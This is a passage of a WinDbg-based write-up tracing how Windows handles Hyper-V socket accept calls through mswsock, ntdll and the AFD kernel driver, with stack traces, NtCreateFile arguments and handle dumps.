<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">00007ff9`415861a3 b807000000 mov eax,7</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">00007ff9`415861a8 f604250803fe7f01 test byte ptr [SharedUserData+0x308 (00000000`7ffe0308)],1</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">00007ff9`415861b0 7503 jne ntdll!NtDeviceIoControlFile+0x15 (00007ff9`415861b5)</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">There is only one instruction, therefore we will consider a stack:</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">WINDBG>dqs @r8</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">00000000`0b8fbb98 00007ff9`3dfc3d34 – we get to SysWoW.dll. The stack at the same time looks so:</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">WINDBG>dqs @r8 (r8 will be placed in rsp just before execution of swapgs, sysret)</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">00000000`0b8fbb98 00007ff9`3dfc3d34 KERNELBASE!ReadFile+0x74</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">00000000`0b8fbba0 00000000`00000000</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Stack content is changed during execution of nt!KeWaitForSingleObject-> nt! KiCommitThreadWait-> nt! KiSwapThread caused from nt! IopSynchronousServiceTail</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">WINDBG>kcn</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"># Call Site</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">00 nt!IopSynchronousServiceTail</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">01 nt!NtReadFile</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">02 nt!KiSystemServiceCopyEnd</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">03 ntdll!NtReadFile</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">04 KERNELBASE!ReadFile</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">05 SHCORE!CFileStream::Read</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">06 windows_storage!CShellLink::_LoadFromStream</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">07 windows_storage!CShellLink::_LoadFromFile</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">08 windows_storage!CShellLink::Load</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">09 windows_storage!InitializeFileHandlerWithFile</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">0a windows_storage!CFileSysItemString::HandlerCreateInstance</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">0b windows_storage!CFSFolder::_BindHandler</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">0c windows_storage!CFSFolder::GetUIObjectOf</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">0d windows_storage!CShellItem::BindToHandler</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">0e SHELL32!CAppResolver::GetAppIDForShortcut</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">0f SHELL32!CAppResolver::GetAppIDForWindow</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">10 Explorer!CTaskBand::CResolveWindowTask::_ResolveWindowWorker</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">11 Explorer!CTaskBand::CResolveWindowTask::_ResolveWindow</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">12 Explorer!CTaskBand::CResolveWindowTask::InternalResumeRT</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">13 Explorer!CRunnableTask::Run</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">14 windows_storage!CShellTask::TT_Run</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">15 windows_storage!CShellTaskThread::ThreadProc</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">16 windows_storage!CShellTaskThread::s_ThreadProc</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">17 SHCORE!ExecuteWorkItemThreadProc</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">18 ntdll!RtlpTpWorkCallback</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">19 ntdll!TppWorkerThread</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">1a KERNEL32!BaseThreadInitThunk</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">1b ntdll!RtlUserThreadStart</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Return happens to another thread. Probably, these are features of WoW64.</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Execution goes without surprises for 64-bit process, and we return to the end of the nt!NtDeviceIoControlFile function after execution of sysret from which there is a return to mswsock!WSPAccept, and program execution stops inside mswsock! SockWaitForSingleObject function.</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><img height="182" src="https://lh3.googleusercontent.com/JEskVL4EW66pcF8SwEdNVQPSRRjReqmh96Lrl4U_lQgusTqSO0hxtD6raCV-tWVfZuT_BMNFfpDKZm9d7P01iG-aftpwsBeb9rGCrmDQ8mGVbLBSfVA4mrtmhzDo5iP_kbmEJePuQHEnYvWiBg" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="228" /></span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Function execution will continue when on the client party will bw </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">connect</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> call. </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Accept</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> execution continues. Mswsock!SockSocket is called (early was called from </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">socket</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">). Next mswsock!SockGetTdiName (with Hyper-V RAW Guid). There is pointer on structure with size not below 0xCC in esi. Variable mswsock!SockTLNPIListenerCount eq 1, GetCurrentProcess is not called, </span><a href="about:blank" style="text-decoration: none;"><span style="background-color: transparent; color: #0563c1; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline;">\\Device\\Afd\\Endpoint</span></a><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> is initialized again, and next NtCreateFile again:</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">NTSTATUS NtCreateFile(</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> _Out_ PHANDLE FileHandle,- 00F6F4A4</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> _In_ ACCESS_MASK DesiredAccess,</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">C0140000</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> _In_ POBJECT_ATTRIBUTES ObjectAttributes, </span><span style="background-color: transparent; color: red; font-family: 'Courier New'; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">00F6F460</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> _Out_ PIO_STATUS_BLOCK IoStatusBlock,- 00F6F480</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> _In_opt_ PLARGE_INTEGER AllocationSize, - 00000000</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> _In_ ULONG FileAttributes,- 00000000</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> _In_ ULONG ShareAccess,- 3</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> _In_ ULONG CreateDisposition,-3 </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> _In_ ULONG CreateOptions,0x20</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> _In_ PVOID EaBuffer,</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">00F6F4DC</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> _In_ ULONG EaLength , 39</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">);</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">WINDBG>dtx _OBJECT_ATTRIBUTES </span><span style="background-color: transparent; color: red; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">00F6F460</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">(*((_OBJECT_ATTRIBUTES *)0xf6f460)) [Type: _OBJECT_ATTRIBUTES]</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> [+0x000] Length : 0x18 [Type: unsigned long]</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> [+0x004] RootDirectory : 0x0 [Type: void *]</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> [+0x008] ObjectName : 0xf6f454 : "\Device\Afd\Endpoint" [Type: _UNICODE_STRING *]</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> [+0x00c] Attributes : 0x42 [Type: unsigned long]</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> [+0x010] SecurityDescriptor : 0x0 [Type: void *]</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> [+0x014] SecurityQualityOfService : 0x0 [Type: void *]</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">In windows kernel: afd!AfdCreateFile-> afd!AfdCheckTDIFilter is not called, afd!AfdAllocateEndpoint executes immediately. After afd!AfdTlFindAndReferenceTransport execution in rax:</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">WINDBG>!mex.foreachitem @rax -c</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffda8527f6b8c0</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">fffff803db337530</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffda8527dfeeb0</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffda8527dfedd0</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffda8527dfeca0</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Processed 5 items.</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 18pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Nt!IoGetCurrentProcess, afd!AfdEndpointsFreeing compates with 0xAh, if eq or above, then afd!AfdReuseEndpoint и ExReleaseResourceAndLeaveCriticalRegion are executed.</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Next we see early mentioned afd!AfdTLCreateEndpoint, next afd!AfdTLPendRequest (result – 103h), then afd! AfdCompleteTLEndpCreate, we return from afd!AfdCreate, next nt!SeClearLearningModeObjectInformation, next nt! SeSetLearningModeObjectInformation and nt! ObpCreateHandle.</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Descriptor number is 0x148h. Now we have two sockets (formally – file objects)</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">0144: Object: ffffda8529a9bcf0 GrantedAccess: 0016019f (Audit) Entry: ffffca8985cb1510</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Object: ffffda8529a9bcf0 Type: (ffffda852718cb00) File</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> ObjectHeader: ffffda8529a9bcc0 (new version)</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> HandleCount: 1 PointerCount: 32761</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> Directory Object: 00000000 Name: \Endpoint {Afd}</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">0148: Object: ffffda8529acc6d0 GrantedAccess: 0016019f (Inherit) Entry: ffffca8985cb1520</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Object: ffffda8529acc6d0 Type: (ffffda852718cb00) File</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
